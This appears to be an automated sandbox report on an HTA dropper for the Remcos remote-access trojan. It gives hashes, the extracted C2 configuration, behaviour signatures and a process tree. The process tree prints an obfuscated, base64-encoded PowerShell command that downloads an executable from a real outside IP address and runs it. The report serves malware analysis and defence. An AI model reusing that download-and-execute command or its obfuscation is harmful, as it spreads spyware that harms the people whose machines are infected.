Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16/12/2024, 16:22

General

  • Target

    crreatedbestthingswithgreatattitudeneedforthat.hta

  • Size

    142KB

  • MD5

    22ca9f87ffb6d9d3dc9d7e4f151470c7

  • SHA1

    df9bcef5ab55d8a5342bb7747d7936f4fe20afe7

  • SHA256

    6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

  • SHA512

    e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2

  • SSDEEP

    768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2076
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2080
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3028

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp

    Filesize

    1KB

    MD5

    231bd52dc7439bba251272cae3e4d318

    SHA1

    641a9acb586866345f751d5c904d5e2aac153de1

    SHA256

    4a9ea347c34633b51985bc581815a85e2b031a7dc5a5c50d452faaa5f9440160

    SHA512

    82fc959401195037c4a72cb1ad2c6602b08b101d70b6890db8cad16f526bcc7e7c6b31b2b78535e35ee4345ab31bcf377a561436ed1183a3f86ffbcf41d223e9

  • C:\Users\Admin\AppData\Local\Temp\nwonvsm-.dll

    Filesize

    3KB

    MD5

    5f23f7054f66283c49b88b714229dc93

    SHA1

    226d34bec9d07d9ab433f120c4ab4e97d616cd77

    SHA256

    a560600f8d8f127957ea89bcfa198eb6c6d9236a763f68bb39269823c399a131

    SHA512

    ca73e9b90e6cb2c70d9c1ee8728248f38906c0bc0eb1c1221f2574cb50ffb2558e75a8e2ea3d38659fb74c29fd644523c04c677be22ed5867cb2e86ed31d160f

  • C:\Users\Admin\AppData\Local\Temp\nwonvsm-.pdb

    Filesize

    7KB

    MD5

    965f859617328356306a3bf742547ffb

    SHA1

    94b997dfed717a10e74ee891c0e38b6852e818e9

    SHA256

    58db4bfbe05f7acd1960c1c13689078372b9af50fde24c3568b3a075df139c42

    SHA512

    d0ebdd2e00910a4aaea31f576266a7059947cc768eb57b3b780d0e8bba2e91d1c6f12fbb6f642cb1e6db452b049e1adab18f03163c6ac5f35b2e8bf0d324c4ec

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp

    Filesize

    652B

    MD5

    3fdcc3672039aa7b981410f10cfb6cf2

    SHA1

    c13d238dc1ffcb42647a27aada00ee073a10f166

    SHA256

    d1aff747b863248fe591ad8a6c812e215622c3192312e8c248fd37e1f0f99520

    SHA512

    7aa58b027843b4f28852a2c8c8f38a14d854c5cb82e0b290b638e48b3538aa6118644c59c597ea4d29f8ac0ec54619c30d2047f305eeab7a41c9017c32185dc0

  • \??\c:\Users\Admin\AppData\Local\Temp\nwonvsm-.0.cs

    Filesize

    478B

    MD5

    80c03b4485808d996cc8226157f377a7

    SHA1

    7cc7e02b84232b1523c555a349c86fc059a98eff

    SHA256

    240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

    SHA512

    ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

  • \??\c:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline

    Filesize

    309B

    MD5

    2eb5f5af0f3121c90a4d13fcf04181a6

    SHA1

    a1bf83f3026d48261c366a1ed906c77e076ab7cd

    SHA256

    bcd172a6ba8c3bb4662fd968f97a9b40062abb79e27c8a0a5763bd7c1e2f2c3c

    SHA512

    80433c3651c0314ce9fe92954cb540764ade1ad1e595595150578e9e3b511e239907744ef503421bcc18d0c4afa4ad3a650249f55731ed7bc23195743dbecd41

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    528KB

    MD5

    a2d03c5333bfecca62720cd6ee3a4dc4

    SHA1

    ce4c380f2748f375904c17b38d4f93e294fef4f6

    SHA256

    ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

    SHA512

    5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

  • memory/3028-35-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-39-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-34-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-32-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-36-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-37-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-38-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-33-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-40-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-41-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-42-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-43-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-44-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-45-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB